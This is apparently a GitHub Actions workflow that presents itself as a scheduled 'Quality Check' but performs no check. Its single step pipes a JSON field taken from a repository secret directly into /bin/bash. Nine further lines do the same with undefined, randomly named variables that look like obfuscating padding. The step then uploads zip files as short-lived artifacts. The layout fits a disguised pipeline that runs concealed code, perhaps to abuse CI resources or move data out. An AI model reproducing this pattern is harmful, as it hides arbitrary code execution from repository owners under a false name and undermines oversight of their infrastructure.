name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '10 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          mju8: ${{ secrets.mju8 }}
        run: |
          printf '%s' "$mju8" | jq -r .uqn28076 | /bin/bash
          echo $bau01735 | jq -r .me32 | /bin/bash
          printf '%s' "$jdpn97" | jq -r .yjf14 | /bin/bash
          echo $s46 | jq -r .lqu5299 | /bin/bash
          echo $girne5988 | jq -r .xk58 | /bin/bash
          echo $swstc5 | jq -r .ezla82613 | /bin/bash
          echo $xwbbp1 | jq -r .fjif77 | /bin/bash
          printf '%s' "$ad7" | jq -r .ix4236 | /bin/bash
          printf '%s' "$rzl5" | jq -r .q74 | /bin/bash
          echo $tg80 | jq -r .ys21029 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: qCssuNJD
          path: "*.zip"
          retention-days: 1
